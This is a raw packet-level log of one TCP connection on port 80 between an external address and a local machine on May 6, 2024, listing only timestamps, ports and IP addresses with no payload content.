May 6, 2024 07:53:08.957278013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957279921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957292080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957294941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957304001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957317114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957321882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957329988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957343102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957345963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957355022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957367897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957370996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957381010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957384109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957395077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957405090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957407951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957420111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957426071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957432032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957436085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957446098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957458973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957459927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957473993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957482100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957487106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957499981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957503080 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957525969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957536936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957536936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957551003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957562923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957576036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957577944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957585096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957587004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957598925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957604885 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957612991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957621098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957624912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957637072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957643032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957650900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957664013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957665920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957688093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957699060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957704067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957712889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957724094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957737923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957737923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957751036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957752943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957762957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957762957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957781076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957783937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957798004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957804918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957818031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957822084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957833052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957834959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957845926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957849026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957865953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957875013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957890034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957901955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957912922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957926035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957926035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957937956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957948923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957952023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957964897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957969904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957978964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957990885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957993031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958005905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958015919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958019018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958029985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958039045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958051920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958053112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958065987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958066940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958080053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958097935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958105087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958122015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958136082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958147049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958158970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958170891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958170891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958184004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958184958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958198071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958210945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958211899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958225012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958225012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958249092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958267927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958268881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958281040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958293915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958306074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958306074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958318949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958321095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958331108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958332062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958343983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958348036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958355904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958358049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958369017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958370924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958384037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958394051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958395958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958409071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958414078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958422899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958436012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958436012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958448887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958460093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958463907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958470106 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958493948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958508015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958517075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958530903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958543062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958554983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958554983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958568096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958568096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958578110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958580971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958595037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958596945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958607912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958611012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958620071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958620071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958633900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958636045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958647966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958647966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958659887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958662987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958673954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958678961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958687067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958688974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958700895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958707094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958714008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958714008 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958728075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958735943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958740950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958753109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958758116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958765984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958779097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958781958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958794117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958803892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958806038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958817959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958820105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958833933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958842993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958848000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958861113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958862066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958873987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958888054 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958910942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.958955050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958967924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958978891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958992004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.958997011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959003925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959017038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959017038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959029913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959042072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959043026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959049940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959075928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959079981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959094048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959105015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959119081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959120989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959135056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959145069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959147930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959161043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959168911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959173918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959182978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959186077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959198952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959208012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959212065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959222078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959224939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959238052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959247112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959250927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959265947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959268093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959279060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959290981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959291935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959304094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959312916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959317923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959331989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959333897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959343910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959357977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959367037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959392071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959398985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959412098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959425926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959438086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959445000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959458113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959471941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959475994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959496021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959522009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959543943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959618092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959630966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959641933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959655046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959667921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959681034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959682941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959697008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959707022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959711075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959722996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959726095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959737062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959749937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959749937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959764957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959772110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959778070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959794998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959820032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959841967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959855080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959866047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959878922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959892988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959904909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959914923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959917068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959923029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959930897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959940910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959944963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959956884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959964037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959969997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959971905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959984064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.959990978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.959997892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960015059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960036993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960076094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960123062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960148096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960160017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960170984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960192919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960195065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960205078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960207939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960228920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960232019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960252047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960262060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960273027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960285902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960298061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960311890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960316896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960324049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960324049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960338116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960350037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960350037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960372925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960372925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960386992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960397005 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960398912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960414886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960417032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960427046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960427999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960443020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960444927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960454941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960455894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960473061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960488081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960525036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960539103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960551023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960551977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960562944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960570097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960576057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960578918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960589886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960601091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960602045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960613966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960627079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960627079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960639954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960649014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960653067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960665941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960666895 CEST	49741	80	192.168.2.4	5.42.66.10
